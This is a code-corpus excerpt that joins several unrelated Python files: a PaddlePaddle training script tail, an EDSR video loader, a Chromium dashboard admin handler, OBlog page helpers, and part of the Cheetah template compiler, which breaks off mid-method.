with open(os.path.join(args.save_dir, 'test_acc.txt'), 'w') as f:
f.write('test_acc:'+str(top1_acc))
def train_hl_api(args):
if args.dataset=='cifar10':
root = os.path.join(args.data_dir, args.dataset, 'cifar-10-python.tar.gz')
print(args)
model = importlib.import_module('models.__init__').__dict__[args.net](
None, drop_path_rate=args.drop_path_rate, use_drop_path=args.use_drop_path, use_official_implement=args.use_official_implement)
train_loader, val_loader, test_loader = importlib.import_module(
'dataset.' + args.dataset).__dict__['load_data'](root, args.train_batch_size,
args.test_batch_size, has_val_dataset=args.has_val_dataset)
criterion = nn.CrossEntropyLoss()
if args.optimizer == 'sgd':
        # The high-level API calls lr_scheduler.step() every iteration, so the
        # milestone intervals are scaled to m * len(train_loader) here.
lr_scheduler = paddle.optimizer.lr.MultiStepDecay(learning_rate=args.learning_rate, milestones=[m*len(train_loader) for m in args.milestones], gamma=args.gamma)
optimizer = paddle.optimizer.Momentum(parameters=model.parameters(),
learning_rate=lr_scheduler,
momentum=args.momentum,
weight_decay=args.weight_decay,
use_nesterov=args.nesterov)
elif args.optimizer == 'adam':
optimizer = paddle.optimizer.AdamW(parameters=model.parameters(),
learning_rate=args.learning_rate,
weight_decay=args.weight_decay)
else:
raise ValueError("optimizer must be sgd or adam.")
model = paddle.Model(model)
    model.prepare(optimizer=optimizer,  # optimizer
                  loss=criterion,  # loss function
                  metrics=paddle.metric.Accuracy())  # evaluation metric
    # Callback for VisualDL visualization
visualdl = paddle.callbacks.VisualDL(log_dir=args.save_dir)
    # Early stopping; used here only to keep the best model on the validation set during training, for the final test-set evaluation
early_stop = paddle.callbacks.EarlyStopping('acc', mode='max', patience=args.epochs, verbose=1,
min_delta=0, baseline=None, save_best_model=True)
    model.fit(train_data=train_loader,  # training dataset
              eval_data=val_loader,  # validation dataset
              epochs=args.epochs,  # number of training epochs
              save_dir=args.save_dir,  # directory for saving model and optimizer parameters
              save_freq=args.save_interval,  # save model/optimizer parameters every N epochs
verbose=1,
log_freq=20,
eval_freq=args.eval_freq,
callbacks=[visualdl, early_stop])
    # Evaluate accuracy on the test set with the best validation-set model
model.load(os.path.join(args.save_dir, 'best_model.pdparams'))
result = model.evaluate(eval_data=test_loader, verbose=1)
print('test acc:', result['acc'], 'test error:', 1-result['acc'])
if __name__ == '__main__':
args = parser_args()
utils.seed_paddle(args.seed)
if not args.high_level_api:
train_model(args)
else:
train_hl_api(args) | 2 | 2 |
dataloader/EDSR/video.py | pidan1231239/SR-Stereo2 | 1 | 11312 | import os
from . import common
import cv2
import numpy as np
import imageio
import torch
import torch.utils.data as data
class Video(data.Dataset):
def __init__(self, args, name='Video', train=False, benchmark=False):
self.args = args
self.name = name
self.scale = args.scale
self.idx_scale = 0
self.train = False
self.do_eval = False
self.benchmark = benchmark
self.filename, _ = os.path.splitext(os.path.basename(args.dir_demo))
self.vidcap = cv2.VideoCapture(args.dir_demo)
self.n_frames = 0
self.total_frames = int(self.vidcap.get(cv2.CAP_PROP_FRAME_COUNT))
def __getitem__(self, idx):
success, lr = self.vidcap.read()
if success:
self.n_frames += 1
lr, = common.set_channel(lr, n_channels=self.args.n_colors)
lr_t, = common.np2Tensor(lr, rgb_range=self.args.rgb_range)
return lr_t, -1, '{}_{:0>5}'.format(self.filename, self.n_frames)
else:
            self.vidcap.release()
return None
def __len__(self):
return self.total_frames
def set_scale(self, idx_scale):
self.idx_scale = idx_scale
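# Usage sketch (hypothetical `args` with `dir_demo`, `scale`, `n_colors`, `rgb_range`):
#
#     dataset = Video(args)
#     loader = torch.utils.data.DataLoader(dataset, batch_size=1)
#     for lr_t, _, filename in loader:
#         ...  # feed each low-resolution frame tensor to the SR model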
| 2.46875 | 2 |
backend/views/__init__.py | chriamue/flask-unchained-react-spa | 5 | 11313 | <filename>backend/views/__init__.py
from .contact_submission_resource import ContactSubmissionResource
| 1.085938 | 1 |
blink_handler.py | oyiptong/chromium-dashboard | 0 | 11314 | <filename>blink_handler.py
# -*- coding: utf-8 -*-
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = '<EMAIL> (<NAME>)'
import collections
import json
import logging
import os
import webapp2
import yaml
# Appengine imports.
from google.appengine.api import memcache
import common
import models
import settings
import util
from schedule import construct_chrome_channels_details
class PopulateSubscribersHandler(common.ContentHandler):
def __populate_subscribers(self):
"""Seeds the database with the team in devrel_team.yaml and adds the team
    member to the specified blink components in that file. Should only be run
if the FeatureOwner database entries have been cleared"""
f = file('%s/data/devrel_team.yaml' % settings.ROOT_DIR, 'r')
for profile in yaml.load_all(f):
blink_components = profile.get('blink_components', [])
blink_components = [models.BlinkComponent.get_by_name(name).key() for name in blink_components]
blink_components = filter(None, blink_components) # Filter out None values
user = models.FeatureOwner(
name=unicode(profile['name']),
email=unicode(profile['email']),
twitter=profile.get('twitter', None),
blink_components=blink_components,
primary_blink_components=blink_components,
watching_all_features=False,
)
user.put()
f.close()
@common.require_edit_permission
def get(self):
if settings.PROD:
return self.response.out.write('Handler not allowed in production.')
models.BlinkComponent.update_db()
self.__populate_subscribers()
return self.redirect('/admin/blink')
class BlinkHandler(common.ContentHandler):
def __update_subscribers_list(self, add=True, user_id=None, blink_component=None, primary=False):
if not user_id or not blink_component:
return False
user = models.FeatureOwner.get_by_id(long(user_id))
if not user:
return True
if primary:
if add:
user.add_as_component_owner(blink_component)
else:
user.remove_as_component_owner(blink_component)
else:
if add:
user.add_to_component_subscribers(blink_component)
else:
user.remove_from_component_subscribers(blink_component)
return True
@common.require_edit_permission
@common.strip_trailing_slash
def get(self, path):
# key = '%s|blinkcomponentowners' % (settings.MEMCACHE_KEY_PREFIX)
# data = memcache.get(key)
# if data is None:
components = models.BlinkComponent.all().order('name').fetch(None)
subscribers = models.FeatureOwner.all().order('name').fetch(None)
# Format for django template
subscribers = [x.format_for_template() for x in subscribers]
for c in components:
c.primaries = [o.name for o in c.owners]
# wf_component_content = models.BlinkComponent.fetch_wf_content_for_components()
# for c in components:
# c.wf_urls = wf_component_content.get(c.name) or []
data = {
'subscribers': subscribers,
'components': components[1:] # ditch generic "Blink" component
}
# memcache.set(key, data)
self.render(data, template_path=os.path.join('admin/blink.html'))
# Remove user from component subscribers.
def put(self, path):
params = json.loads(self.request.body)
self.__update_subscribers_list(False, user_id=params.get('userId'),
blink_component=params.get('componentName'),
primary=params.get('primary'))
self.response.set_status(200, message='User removed from subscribers')
return self.response.write(json.dumps({'done': True}))
# Add user to component subscribers.
def post(self, path):
params = json.loads(self.request.body)
self.__update_subscribers_list(True, user_id=params.get('userId'),
blink_component=params.get('componentName'),
primary=params.get('primary'))
# memcache.flush_all()
# memcache.delete('%s|blinkcomponentowners' % (settings.MEMCACHE_KEY_PREFIX))
self.response.set_status(200, message='User added to subscribers')
return self.response.write(json.dumps(params))
class SubscribersHandler(common.ContentHandler):
@common.require_edit_permission
# @common.strip_trailing_slash
def get(self, path):
users = models.FeatureOwner.all().order('name').fetch(None)
feature_list = models.Feature.get_chronological()
milestone = self.request.get('milestone') or None
if milestone:
milestone = int(milestone)
feature_list = filter(lambda f: (f['shipped_milestone'] or f['shipped_android_milestone']) == milestone, feature_list)
list_features_per_owner = 'showFeatures' in self.request.GET
for user in users:
# user.subscribed_components = [models.BlinkComponent.get(key) for key in user.blink_components]
user.owned_components = [models.BlinkComponent.get(key) for key in user.primary_blink_components]
for component in user.owned_components:
component.features = []
if list_features_per_owner:
component.features = filter(lambda f: component.name in f['blink_components'], feature_list)
details = construct_chrome_channels_details()
data = {
'subscribers': users,
'channels': collections.OrderedDict([
('stable', details['stable']),
('beta', details['beta']),
('dev', details['dev']),
('canary', details['canary']),
]),
'selected_milestone': int(milestone) if milestone else None
}
self.render(data, template_path=os.path.join('admin/subscribers.html'))
app = webapp2.WSGIApplication([
('/admin/blink/populate_subscribers', PopulateSubscribersHandler),
('/admin/subscribers(.*)', SubscribersHandler),
('(.*)', BlinkHandler),
], debug=settings.DEBUG)
| 2.234375 | 2 |
OBlog/blueprint/pages/main.py | OhYee/OBlog | 23 | 11315 | <gh_stars>10-100
from OBlog import database as db
from flask import g, current_app
import re
def getPages():
if not hasattr(g, "getPages"):
res = db.query_db('select * from pages;')
res.sort(key=lambda x: int(x["idx"]))
g.getPages = res
return g.getPages
def getPagesDict():
if not hasattr(g, "getPagesDict"):
pages = getPages()
res = dict((page['url'], page) for page in pages)
g.getPagesDict = res
return g.getPagesDict
def addPages(postRequest):
current_app.logger.debug(postRequest)
if db.exist_db('pages', {'url': postRequest['url']}):
        # already exists
return 1
if not (re.match(r'^[0-9]+$', postRequest["idx"])):
return 2
keyList = ['url', 'title', 'idx']
postRequest = dict((key, postRequest[key] if key in postRequest else "")for key in keyList)
postRequest['show'] = 'true'
db.insert_db('pages', postRequest)
return 0
def updatePage(postRequest):
current_app.logger.debug(postRequest)
oldurl = postRequest['oldurl']
url = postRequest['url']
if url != oldurl and db.exist_db('pages', {'url': url}):
        # duplicate url
return 1
if not (re.match(r'^[0-9]+$', postRequest["idx"])):
return 2
keyList = ['url', 'title', 'idx', 'show']
postRequest = dict((key, postRequest[key] if key in postRequest else "")for key in keyList)
db.update_db("pages", postRequest, {'url': oldurl})
return 0
def deletePage(postRequest):
current_app.logger.debug(postRequest)
url = postRequest['url']
if not db.exist_db('pages', {'url': url}):
        # does not exist
return 1
db.delete_db("pages", {'url': url})
return 0
import os
def absPath(path):
from OBlog import app
path = os.path.join(app.config['ROOTPATH'],
"OBlog/templates/pages", path)
return path
def fileExist(path):
return os.path.exists(path) == True
def getPageTemplate(path):
path = absPath(path)
if not fileExist(path):
return (1, "")
content = ""
with open(path, 'r', encoding='utf-8') as f:
content = f.read()
return (0, content)
def getPageTemplateList():
return listFiles(absPath('.'))
def listFiles(path):
return [file
for file in os.listdir(path)
if os.path.isfile(os.path.join(path, file))]
def setPageTemplate(path, content):
path = absPath(path)
with open(path, 'w', encoding='utf-8') as f:
f.write(content)
return 0
def delPageTemplate(path):
path = absPath(path)
if not fileExist(path):
return 1
os.remove(path)
return 0
| 2.546875 | 3 |
lib/rabbitmq-dotnet-client-rabbitmq_v3_4_4/docs/pyle2-fcfcf7e/Cheetah/Compiler.py | CymaticLabs/Unity3d.Amqp | 83 | 11316 | #!/usr/bin/env python
# $Id: Compiler.py,v 1.148 2006/06/22 00:18:22 tavis_rudd Exp $
"""Compiler classes for Cheetah:
ModuleCompiler aka 'Compiler'
ClassCompiler
MethodCompiler
If you are trying to grok this code start with ModuleCompiler.__init__,
ModuleCompiler.compile, and ModuleCompiler.__getattr__.
Meta-Data
================================================================================
Author: <NAME> <<EMAIL>>
Version: $Revision: 1.148 $
Start Date: 2001/09/19
Last Revision Date: $Date: 2006/06/22 00:18:22 $
"""
__author__ = "<NAME> <<EMAIL>>"
__revision__ = "$Revision: 1.148 $"[11:-2]
import sys
import os
import os.path
from os.path import getmtime, exists
import re
import types
import time
import random
import warnings
import __builtin__
import copy
from Cheetah.Version import Version, VersionTuple
from Cheetah.SettingsManager import SettingsManager
from Cheetah.Parser import Parser, ParseError, specialVarRE, \
STATIC_CACHE, REFRESH_CACHE, SET_LOCAL, SET_GLOBAL,SET_MODULE
from Cheetah.Utils.Indenter import indentize # an undocumented preprocessor
from Cheetah import ErrorCatchers
from Cheetah import NameMapper
from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList
VFFSL=valueFromFrameOrSearchList
VFSL=valueFromSearchList
VFN=valueForName
currentTime=time.time
class Error(Exception): pass
DEFAULT_COMPILER_SETTINGS = {
## controlling the handling of Cheetah $placeholders
'useNameMapper': True, # Unified dotted notation and the searchList
'useSearchList': True, # if false, assume the first
# portion of the $variable (before the first dot) is a global,
# builtin, or local var that doesn't need
# looking up in the searchlist BUT use
# namemapper on the rest of the lookup
'allowSearchListAsMethArg': True,
'useAutocalling': True, # detect and call callable()'s, requires NameMapper
'useStackFrames': True, # use NameMapper.valueFromFrameOrSearchList
# rather than NameMapper.valueFromSearchList
'useErrorCatcher':False,
'alwaysFilterNone':True, # filter out None, before the filter is called
'useFilters':True, # use str instead if =False
'includeRawExprInFilterArgs':True,
#'lookForTransactionAttr':False,
'autoAssignDummyTransactionToSelf':False,
'useKWsDictArgForPassingTrans':True,
## controlling the aesthetic appearance / behaviour of generated code
'commentOffset': 1,
# should shorter str constant chunks be printed using repr rather than ''' quotes
'reprShortStrConstants': True,
'reprNewlineThreshold':3,
'outputRowColComments':True,
# should #block's be wrapped in a comment in the template's output
'includeBlockMarkers': False,
'blockMarkerStart':('\n<!-- START BLOCK: ',' -->\n'),
'blockMarkerEnd':('\n<!-- END BLOCK: ',' -->\n'),
'defDocStrMsg':'Autogenerated by CHEETAH: The Python-Powered Template Engine',
'setup__str__method': False,
'mainMethodName':'respond',
'mainMethodNameForSubclasses':'writeBody',
'indentationStep': ' '*4,
'initialMethIndentLevel': 2,
'monitorSrcFile':False,
'outputMethodsBeforeAttributes': True,
## customizing the #extends directive
'autoImportForExtendsDirective':True,
'handlerForExtendsDirective':None, # baseClassName = handler(compiler, baseClassName)
# a callback hook for customizing the
# #extends directive. It can manipulate
# the compiler's state if needed.
# also see allowExpressionsInExtendsDirective
# input filtering/restriction
# use lower case keys here!!
'disabledDirectives':[], # list of directive keys, without the start token
'enabledDirectives':[], # list of directive keys, without the start token
'disabledDirectiveHooks':[], # callable(parser, directiveKey)
'preparseDirectiveHooks':[], # callable(parser, directiveKey)
'postparseDirectiveHooks':[], # callable(parser, directiveKey)
'preparsePlaceholderHooks':[], # callable(parser)
'postparsePlaceholderHooks':[], # callable(parser)
# the above hooks don't need to return anything
'expressionFilterHooks':[], # callable(parser, expr, exprType, rawExpr=None, startPos=None)
# exprType is the name of the directive, 'psp', or 'placeholder'. all
# lowercase. The filters *must* return the expr or raise an exception.
# They can modify the expr if needed.
'templateMetaclass':None, # strictly optional. Only works with new-style baseclasses
'i18NFunctionName':'self.i18n',
## These are used in the parser, but I've put them here for the time being to
## facilitate separating the parser and compiler:
'cheetahVarStartToken':'$',
'commentStartToken':'##',
'multiLineCommentStartToken':'#*',
'multiLineCommentEndToken':'*#',
'gobbleWhitespaceAroundMultiLineComments':True,
'directiveStartToken':'#',
'directiveEndToken':'#',
'allowWhitespaceAfterDirectiveStartToken':False,
'PSPStartToken':'<%',
'PSPEndToken':'%>',
'EOLSlurpToken':'#',
'gettextTokens': ["_", "N_", "ngettext"],
'allowExpressionsInExtendsDirective': False, # the default restricts it to
# accepting dotted names
'allowEmptySingleLineMethods': False,
'allowNestedDefScopes': True,
'allowPlaceholderFilterArgs': True,
## See Parser.initDirectives() for the use of the next 3
#'directiveNamesAndParsers':{}
#'endDirectiveNamesAndHandlers':{}
#'macroDirectives':{}
}
class GenUtils:
"""An abstract baseclass for the Compiler classes that provides methods that
perform generic utility functions or generate pieces of output code from
information passed in by the Parser baseclass. These methods don't do any
parsing themselves.
"""
def genTimeInterval(self, timeString):
##@@ TR: need to add some error handling here
if timeString[-1] == 's':
interval = float(timeString[:-1])
elif timeString[-1] == 'm':
interval = float(timeString[:-1])*60
elif timeString[-1] == 'h':
interval = float(timeString[:-1])*60*60
elif timeString[-1] == 'd':
interval = float(timeString[:-1])*60*60*24
elif timeString[-1] == 'w':
interval = float(timeString[:-1])*60*60*24*7
else: # default to minutes
interval = float(timeString)*60
return interval
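    # Illustrative conversions implied by the suffix rules above:
    #   genTimeInterval('30s') -> 30.0
    #   genTimeInterval('2h')  -> 7200.0
    #   genTimeInterval('15')  -> 900.0  (no suffix defaults to minutes)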
def genCacheInfo(self, cacheTokenParts):
"""Decipher a placeholder cachetoken
"""
cacheInfo = {}
if cacheTokenParts['REFRESH_CACHE']:
cacheInfo['type'] = REFRESH_CACHE
cacheInfo['interval'] = self.genTimeInterval(cacheTokenParts['interval'])
elif cacheTokenParts['STATIC_CACHE']:
cacheInfo['type'] = STATIC_CACHE
return cacheInfo # is empty if no cache
def genCacheInfoFromArgList(self, argList):
cacheInfo = {'type':REFRESH_CACHE}
for key, val in argList:
if val[0] in '"\'':
val = val[1:-1]
if key == 'timer':
key = 'interval'
val = self.genTimeInterval(val)
cacheInfo[key] = val
return cacheInfo
def genCheetahVar(self, nameChunks, plain=False):
if nameChunks[0][0] in self.setting('gettextTokens'):
self.addGetTextVar(nameChunks)
if self.setting('useNameMapper') and not plain:
return self.genNameMapperVar(nameChunks)
else:
return self.genPlainVar(nameChunks)
def addGetTextVar(self, nameChunks):
"""Output something that gettext can recognize.
This is a harmless side effect necessary to make gettext work when it
is scanning compiled templates for strings marked for translation.
@@TR: another marginally more efficient approach would be to put the
output in a dummy method that is never called.
"""
# @@TR: this should be in the compiler not here
self.addChunk("if False:")
self.indent()
self.addChunk(self.genPlainVar(nameChunks[:]))
self.dedent()
def genPlainVar(self, nameChunks):
"""Generate Python code for a Cheetah $var without using NameMapper
(Unified Dotted Notation with the SearchList).
"""
nameChunks.reverse()
chunk = nameChunks.pop()
pythonCode = chunk[0] + chunk[2]
while nameChunks:
chunk = nameChunks.pop()
pythonCode = (pythonCode + '.' + chunk[0] + chunk[2])
return pythonCode
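    # Example derived from the loop above: the chunks for $a.b.c[1].d()
    #   [('a.b.c', True, '[1]'), ('d', False, '()')]
    # compile to the plain Python expression:
    #   a.b.c[1].d()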
def genNameMapperVar(self, nameChunks):
"""Generate valid Python code for a Cheetah $var, using NameMapper
(Unified Dotted Notation with the SearchList).
nameChunks = list of var subcomponents represented as tuples
[ (name,useAC,remainderOfExpr),
]
where:
name = the dotted name base
          useAC = whether NameMapper should use autocalling on namemapperPart
remainderOfExpr = any arglist, index, or slice
If remainderOfExpr contains a call arglist (e.g. '(1234)') then useAC
is False, otherwise it defaults to True. It is overridden by the global
setting 'useAutocalling' if this setting is False.
EXAMPLE
------------------------------------------------------------------------
if the raw Cheetah Var is
$a.b.c[1].d().x.y.z
nameChunks is the list
[ ('a.b.c',True,'[1]'), # A
('d',False,'()'), # B
('x.y.z',True,''), # C
]
When this method is fed the list above it returns
VFN(VFN(VFFSL(SL, 'a.b.c',True)[1], 'd',False)(), 'x.y.z',True)
which can be represented as
VFN(B`, name=C[0], executeCallables=(useAC and C[1]))C[2]
where:
VFN = NameMapper.valueForName
VFFSL = NameMapper.valueFromFrameOrSearchList
VFSL = NameMapper.valueFromSearchList # optionally used instead of VFFSL
SL = self.searchList()
useAC = self.setting('useAutocalling') # True in this example
A = ('a.b.c',True,'[1]')
B = ('d',False,'()')
C = ('x.y.z',True,'')
C` = VFN( VFN( VFFSL(SL, 'a.b.c',True)[1],
'd',False)(),
'x.y.z',True)
= VFN(B`, name='x.y.z', executeCallables=True)
B` = VFN(A`, name=B[0], executeCallables=(useAC and B[1]))B[2]
A` = VFFSL(SL, name=A[0], executeCallables=(useAC and A[1]))A[2]
Note, if the compiler setting useStackFrames=False (default is true)
then
A` = VFSL([locals()]+SL+[globals(), __builtin__], name=A[0], executeCallables=(useAC and A[1]))A[2]
This option allows Cheetah to be used with Psyco, which doesn't support
stack frame introspection.
"""
defaultUseAC = self.setting('useAutocalling')
useSearchList = self.setting('useSearchList')
nameChunks.reverse()
name, useAC, remainder = nameChunks.pop()
if not useSearchList:
firstDotIdx = name.find('.')
if firstDotIdx != -1 and firstDotIdx < len(name):
beforeFirstDot, afterDot = name[:firstDotIdx], name[firstDotIdx+1:]
pythonCode = ('VFN(' + beforeFirstDot +
',"' + afterDot +
'",' + repr(defaultUseAC and useAC) + ')'
+ remainder)
else:
pythonCode = name+remainder
elif self.setting('useStackFrames'):
pythonCode = ('VFFSL(SL,'
'"'+ name + '",'
+ repr(defaultUseAC and useAC) + ')'
+ remainder)
else:
pythonCode = ('VFSL([locals()]+SL+[globals(), __builtin__],'
'"'+ name + '",'
+ repr(defaultUseAC and useAC) + ')'
+ remainder)
##
while nameChunks:
name, useAC, remainder = nameChunks.pop()
pythonCode = ('VFN(' + pythonCode +
',"' + name +
'",' + repr(defaultUseAC and useAC) + ')'
+ remainder)
return pythonCode
##################################################
## METHOD COMPILERS
class MethodCompiler(GenUtils):
def __init__(self, methodName, classCompiler,
initialMethodComment=None,
decorator=None):
self._settingsManager = classCompiler
self._classCompiler = classCompiler
self._moduleCompiler = classCompiler._moduleCompiler
self._methodName = methodName
self._initialMethodComment = initialMethodComment
self._setupState()
self._decorator = decorator
def setting(self, key):
return self._settingsManager.setting(key)
def _setupState(self):
self._indent = self.setting('indentationStep')
self._indentLev = self.setting('initialMethIndentLevel')
self._pendingStrConstChunks = []
self._methodSignature = None
self._methodDef = None
self._docStringLines = []
self._methodBodyChunks = []
self._cacheRegionsStack = []
self._callRegionsStack = []
self._captureRegionsStack = []
self._filterRegionsStack = []
self._isErrorCatcherOn = False
self._hasReturnStatement = False
self._isGenerator = False
def cleanupState(self):
"""Called by the containing class compiler instance
"""
pass
def methodName(self):
return self._methodName
def setMethodName(self, name):
self._methodName = name
## methods for managing indentation
def indentation(self):
return self._indent * self._indentLev
def indent(self):
self._indentLev +=1
def dedent(self):
if self._indentLev:
self._indentLev -=1
else:
raise Error('Attempt to dedent when the indentLev is 0')
## methods for final code wrapping
def methodDef(self):
if self._methodDef:
return self._methodDef
else:
return self.wrapCode()
__str__ = methodDef
def wrapCode(self):
self.commitStrConst()
methodDefChunks = (
self.methodSignature(),
'\n',
self.docString(),
self.methodBody() )
methodDef = ''.join(methodDefChunks)
self._methodDef = methodDef
return methodDef
def methodSignature(self):
return self._indent + self._methodSignature + ':'
def setMethodSignature(self, signature):
self._methodSignature = signature
def methodBody(self):
return ''.join( self._methodBodyChunks )
def docString(self):
if not self._docStringLines:
return ''
ind = self._indent*2
docStr = (ind + '"""\n' + ind +
('\n' + ind).join([ln.replace('"""',"'''") for ln in self._docStringLines]) +
'\n' + ind + '"""\n')
return docStr
## methods for adding code
def addMethDocString(self, line):
self._docStringLines.append(line.replace('%','%%'))
def addChunk(self, chunk):
self.commitStrConst()
chunk = "\n" + self.indentation() + chunk
self._methodBodyChunks.append(chunk)
def appendToPrevChunk(self, appendage):
self._methodBodyChunks[-1] = self._methodBodyChunks[-1] + appendage
def addWriteChunk(self, chunk):
self.addChunk('write(' + chunk + ')')
def addFilteredChunk(self, chunk, filterArgs=None, rawExpr=None, lineCol=None):
if filterArgs is None:
filterArgs = ''
if self.setting('includeRawExprInFilterArgs') and rawExpr:
filterArgs += ', rawExpr=%s'%repr(rawExpr)
if self.setting('alwaysFilterNone'):
if rawExpr and rawExpr.find('\n')==-1 and rawExpr.find('\r')==-1:
self.addChunk("_v = %s # %r"%(chunk, rawExpr))
if lineCol:
self.appendToPrevChunk(' on line %s, col %s'%lineCol)
else:
self.addChunk("_v = %s"%chunk)
if self.setting('useFilters'):
self.addChunk("if _v is not None: write(_filter(_v%s))"%filterArgs)
else:
self.addChunk("if _v is not None: write(str(_v))")
else:
if self.setting('useFilters'):
self.addChunk("write(_filter(%s%s))"%(chunk,filterArgs))
else:
self.addChunk("write(str(%s))"%chunk)
def _appendToPrevStrConst(self, strConst):
if self._pendingStrConstChunks:
self._pendingStrConstChunks.append(strConst)
else:
self._pendingStrConstChunks = [strConst]
def _unescapeCheetahVars(self, theString):
"""Unescape any escaped Cheetah \$vars in the string.
"""
token = self.setting('cheetahVarStartToken')
return theString.replace('\\' + token, token)
def _unescapeDirectives(self, theString):
"""Unescape any escaped Cheetah \$vars in the string.
"""
token = self.setting('directiveStartToken')
return theString.replace('\\' + token, token)
def commitStrConst(self):
"""Add the code for outputting the pending strConst without chopping off
any whitespace from it.
"""
if self._pendingStrConstChunks:
strConst = self._unescapeCheetahVars(''.join(self._pendingStrConstChunks))
strConst = self._unescapeDirectives(strConst)
self._pendingStrConstChunks = []
if not strConst:
return
if self.setting('reprShortStrConstants') and \
strConst.count('\n') < self.setting('reprNewlineThreshold'):
self.addWriteChunk( repr(strConst).replace('\\012','\\n'))
else:
strConst = strConst.replace('\\','\\\\').replace("'''","'\'\'\'")
if strConst[0] == "'":
strConst = '\\' + strConst
if strConst[-1] == "'":
strConst = strConst[:-1] + '\\' + strConst[-1]
self.addWriteChunk("'''" + strConst + "'''" )
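# Illustrative sketch (assumption): commitStrConst() flushes pending literal text
# as a single write call in the generated code, e.g. the template literal
# "Hello, world\n" becomes either
#     write('Hello, world\n')          # reprShortStrConstants path
# or
#     write('''Hello, world
# ''')                                 # triple-quoted path for longer constants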
def handleWSBeforeDirective(self):
"""Truncate the pending strConst to the beginning of the current line.
"""
if self._pendingStrConstChunks:
src = self._pendingStrConstChunks[-1]
BOL = max(src.rfind('\n')+1, src.rfind('\r')+1, 0)
if BOL < len(src):
self._pendingStrConstChunks[-1] = src[:BOL]
def isErrorCatcherOn(self):
return self._isErrorCatcherOn
def turnErrorCatcherOn(self):
self._isErrorCatcherOn = True
def turnErrorCatcherOff(self):
self._isErrorCatcherOn = False
# @@TR: consider merging the next two methods into one
def addStrConst(self, strConst):
self._appendToPrevStrConst(strConst)
def addRawText(self, text):
self.addStrConst(text)
def addMethComment(self, comm):
offSet = self.setting('commentOffset')
self.addChunk('#' + ' '*offSet + comm)
def addPlaceholder(self, expr, filterArgs, rawPlaceholder,
cacheTokenParts, lineCol,
silentMode=False):
cacheInfo = self.genCacheInfo(cacheTokenParts)
if cacheInfo:
cacheInfo['ID'] = repr(rawPlaceholder)[1:-1]
self.startCacheRegion(cacheInfo, lineCol, rawPlaceholder=rawPlaceholder)
if self.isErrorCatcherOn():
methodName = self._classCompiler.addErrorCatcherCall(
expr, rawCode=rawPlaceholder, lineCol=lineCol)
expr = 'self.' + methodName + '(localsDict=locals())'
if silentMode:
self.addChunk('try:')
self.indent()
self.addFilteredChunk(expr, filterArgs, rawPlaceholder, lineCol=lineCol)
self.dedent()
self.addChunk('except NotFound: pass')
else:
self.addFilteredChunk(expr, filterArgs, rawPlaceholder, lineCol=lineCol)
if self.setting('outputRowColComments'):
self.appendToPrevChunk(' # from line %s, col %s' % lineCol + '.')
if cacheInfo:
self.endCacheRegion()
def addSilent(self, expr):
self.addChunk( expr )
def addEcho(self, expr, rawExpr=None):
self.addFilteredChunk(expr, rawExpr=rawExpr)
def addSet(self, expr, exprComponents, setStyle):
if setStyle is SET_GLOBAL:
(LVALUE, OP, RVALUE) = (exprComponents.LVALUE,
exprComponents.OP,
exprComponents.RVALUE)
# we need to split the LVALUE to deal with globalSetVars
splitPos1 = LVALUE.find('.')
splitPos2 = LVALUE.find('[')
if splitPos1 > 0 and splitPos2==-1:
splitPos = splitPos1
elif splitPos1 > 0 and splitPos1 < max(splitPos2,0):
splitPos = splitPos1
else:
splitPos = splitPos2
if splitPos >0:
primary = LVALUE[:splitPos]
secondary = LVALUE[splitPos:]
else:
primary = LVALUE
secondary = ''
LVALUE = 'self._CHEETAH__globalSetVars["' + primary + '"]' + secondary
expr = LVALUE + ' ' + OP + ' ' + RVALUE.strip()
if setStyle is SET_MODULE:
self._moduleCompiler.addModuleGlobal(expr)
else:
self.addChunk(expr)
def addInclude(self, sourceExpr, includeFrom, isRaw):
self.addChunk('self._handleCheetahInclude(' + sourceExpr +
', trans=trans, ' +
'includeFrom="' + includeFrom + '", raw=' +
repr(isRaw) + ')')
def addWhile(self, expr, lineCol=None):
self.addIndentingDirective(expr, lineCol=lineCol)
def addFor(self, expr, lineCol=None):
self.addIndentingDirective(expr, lineCol=lineCol)
def addRepeat(self, expr, lineCol=None):
#the _repeatCount stuff here allows nesting of #repeat directives
self._repeatCount = getattr(self, "_repeatCount", -1) + 1
self.addFor('for __i%s in range(%s)' % (self._repeatCount,expr), lineCol=lineCol)
def addIndentingDirective(self, expr, lineCol=None):
if expr and not expr[-1] == ':':
expr = expr + ':'
self.addChunk( expr )
if lineCol:
self.appendToPrevChunk(' # generated from line %s, col %s'%lineCol )
self.indent()
def addReIndentingDirective(self, expr, dedent=True, lineCol=None):
self.commitStrConst()
if dedent:
self.dedent()
if not expr[-1] == ':':
expr = expr + ':'
self.addChunk( expr )
if lineCol:
self.appendToPrevChunk(' # generated from line %s, col %s'%lineCol )
self.indent()
def addIf(self, expr, lineCol=None):
"""For a full #if ... #end if directive
"""
self.addIndentingDirective(expr, lineCol=lineCol)
def addOneLineIf(self, expr, lineCol=None):
"""For a single-line #if directive (no #end if)
"""
self.addIndentingDirective(expr, lineCol=lineCol)
def addTernaryExpr(self, conditionExpr, trueExpr, falseExpr, lineCol=None):
"""For a single-line #if ... then ... else ... directive
<condition> then <trueExpr> else <falseExpr>
"""
self.addIndentingDirective(conditionExpr, lineCol=lineCol)
self.addFilteredChunk(trueExpr)
self.dedent()
self.addIndentingDirective('else')
self.addFilteredChunk(falseExpr)
self.dedent()
def addElse(self, expr, dedent=True, lineCol=None):
expr = re.sub(r'else[ \f\t]+if','elif', expr)
self.addReIndentingDirective(expr, dedent=dedent, lineCol=lineCol)
def addElif(self, expr, dedent=True, lineCol=None):
self.addElse(expr, dedent=dedent, lineCol=lineCol)
def addUnless(self, expr, lineCol=None):
self.addIf('if not (' + expr + ')')
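# Illustrative sketch (assumption): '#unless EXPR' therefore compiles exactly like
# '#if not (EXPR)', i.e. addUnless() produces a chunk such as
#     if not (VFFSL(SL, "x", True)):
# followed by an indent, mirroring addIf()/addIndentingDirective().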
def addClosure(self, functionName, argsList, parserComment):
argStringChunks = []
for arg in argsList:
chunk = arg[0]
if not arg[1] == None:
chunk += '=' + arg[1]
argStringChunks.append(chunk)
